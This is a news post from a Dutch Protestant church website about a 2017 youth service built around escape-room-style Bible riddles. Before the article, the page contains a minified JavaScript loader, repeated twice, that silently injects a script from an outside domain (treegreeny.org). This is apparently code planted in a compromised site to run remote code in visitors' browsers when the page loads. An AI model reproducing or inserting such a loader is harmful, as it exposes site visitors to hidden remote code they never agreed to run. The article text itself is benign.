;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Escapes in de Bijbel ... de code gekraakt ! - PKN Damwâld

Escapes in de Bijbel … de code gekraakt !

Gepubliceerd op: maandag 20 februari 2017

De uitdagende uitnodiging ‘Escapes in de Bijbel …Kraak jij de code?’ na die geslaagde mysteryactiviteit op 21 januari in de Tolbertse ‘escape room’ bleek eigenlijk al voldoende. Een groot aantal jongeren toogden afgelopen zondagmiddag naar de speciale jongerendienst in De Ikker en werden door ds. S. Boukes (nogmaals) getrakteerd op nog een paar uitdagende (Bijbelse-) ‘codes’. Samen raadsels ‘kraken’, opdrachten doen en ’out of the box’ een oplossing bedenken? Ondanks de door ds. Boukes opgelegde ‘druk’ dat het oplossende vermogen van de jongeren bepalend zou zijn voor de duur/lengte van de dienst, bleken de hulplijnen (lees de overige gemeenteleden) niet echt nodig te zijn. Heel knap trouwens, want volgens ingewijde bronnen bleek ook de dienstdoende kerkenraad er een behoorlijke dobber aan te hebben gehad.

Net als in de ‘Race to Escape’ lijkt de Bijbel en het geloof in Christus ingewikkeld en onvoorspelbaar, maar uiteindelijk blijkt het allemaal toch erg logisch te zijn. De Bijbelverhalen hebben altijd een doel: de plot waar de ontsnapping, waar het in het echte leven over/om gaat. Je bent daarbij als het ware het onderwerp in het verhaal, je ontrafelt het mysterie. Om die mysteries te kunnen kraken zul je je (samen met anderen-) in het geloof moeten verdiepen, bezinnen en zul je je ‘vertrouwde ik’ moeten loslaten ! Stel je dus open voor nieuwe dingen! Er is voor de meesten van ons aan alle kanten winst te behalen. Zoeken naar het voor jou bekende en onbekende, zoeken naar uitdaging. Vertrouw daarbij op Jezus, vertrouw op de Bijbel en kijk vooruit. En dan op naar een goed resultaat en een uitweg!